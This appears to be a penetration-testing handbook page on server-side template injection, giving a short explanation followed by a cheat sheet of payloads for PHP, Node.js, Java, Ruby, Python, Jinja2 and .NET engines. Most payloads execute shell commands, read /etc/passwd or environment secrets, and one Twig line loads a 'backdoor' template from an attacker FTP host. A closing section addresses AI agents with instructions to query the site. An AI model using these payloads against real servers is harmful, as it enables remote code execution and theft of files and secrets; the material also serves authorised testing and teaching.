> For the complete documentation index, see [llms.txt](https://cyb3r.gitbook.io/pentestbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cyb3r.gitbook.io/pentestbook/enumeration/web/ssti.md). # SSTI ## What is server-side template injection? A server-side template injection occurs when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. **Template engines** are designed to **generate web** pages by **combining** **fixed** templates with **volatile** data. Server-side template injection attacks can occur when **user input** is concatenated directly **into a template**, rather than passed in as data. This allows attackers to **inject arbitrary template directives** in order to manipulate the template engine, often enabling them to take **complete control of the server**. An example of vulnerable code see the following one: ```php $output = $twig->render("Dear " . $_GET['name']); ``` In the previous example **part of the template** itself is being **dynamically generated** using the `GET` parameter `name`. As template syntax is evaluated server-side, this potentially allows an attacker to place a server-side template injection payload inside the `name` parameter as follows: ``` http://vulnerable-website.com/?name={{bad-stuff-here}} ``` ### Detection In most cases, this polyglot payload will trigger an error in presence of a SSTI vulnerability : ``` ${{<%[%'"}}%\. ``` ```bash # Tool # https://github.com/epinna/tplmap tplmap.py -u 'http://www.target.com/page?name=John' # Payloads # https://github.com/payloadbox/ssti-payloads # Oneliner # Check SSTI in all param with qsreplace waybackurls http://target.com | qsreplace "ssti{{9*9}}" > fuzz.txt ffuf -u FUZZ -w fuzz.txt -replay-proxy http://127.0.0.1:8080/ # Check in burp for reponses with ssti81 # Generic ${{<%[%'"}}%\. {% debug %} {7*7} {{ '7'*7 }} {{ [] .class.base.subclassesO }} {{''.class.mro()[l] .subclassesO}} for c in [1,2,3] %}{{ c,c,c }}{% endfor %} {{ [].__class__.__base__.__subclasses__O }} # PHP Based {php}print "Hello"{/php} {php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php} {{7*7}} {{7*'7'}} {{dump(app)}} {{app.request.server.all|join(',')}} "{{'/etc/passwd'|file_excerpt(1,30)}}"@ {{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}} {$smarty.version} {php}echo `id`;{/php} {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} # Node.js Backend based {{ this }}-> [Object Object] {{ this.__proto__ }}-> [Object Object] {{ this.__proto__.constructor.name }}-> Object {{this.constructor.constructor}} {{this. constructor. constructor('process.pid')()}} {{#with "e"}} {{#with split as |conslist|}} {{this.pop}} {{this.push (lookup string.sub "constructor")}} {{this.pop}} {{#with string.split as |codelist|}} {{this.pop}} {{this.push "return require('child_process').exec('whoami');"}} {{this.pop}} {{#each conslist}} {{#with (string.sub.apply 0 codelist)}} {{this}} {{/with}} {{/each}} #set($str=$class.inspect("java.lang.String").type) #set($chr=$class.inspect("java.lang.Character").type) #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami")) $ex.waitFor() #set($out=$ex.getInputStream()) #foreach($i in [1..$out.available()]) $str.valueOf($chr.toChars($out.read())) #end # Java ${7*7} <#assign command="freemarker.template.utility.Execute"?new()> ${ command("cat /etc/passwd") } ${{7*7}} ${class.getClassLoader()} ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ${T(java.lang.System).getenv()} ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/etc/passwd').toURL().openStream().readAllBytes()?join(" ")} # Ruby <%= system("whoami") %> <%= Dir.entries('/') %> <%= File.open('/example/arbitrary-file').read %> # Python {% debug %} {{settings.SECRET_KEY}} {% import foobar %} = Error {% import os %}{{os.system('whoami')}} # Perl <%= perl code %> <% perl code %> # Flask/Jinja2 {{ '7'*7 }} {{ [].class.base.subclasses() }} # get all classes {{''.class.mro()[1].subclasses()}} {%for c in [1,2,3] %}{{c,c,c}}{% endfor %} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} # .Net @(1+2) @{// C# code} ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cyb3r.gitbook.io/pentestbook/enumeration/web/ssti.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.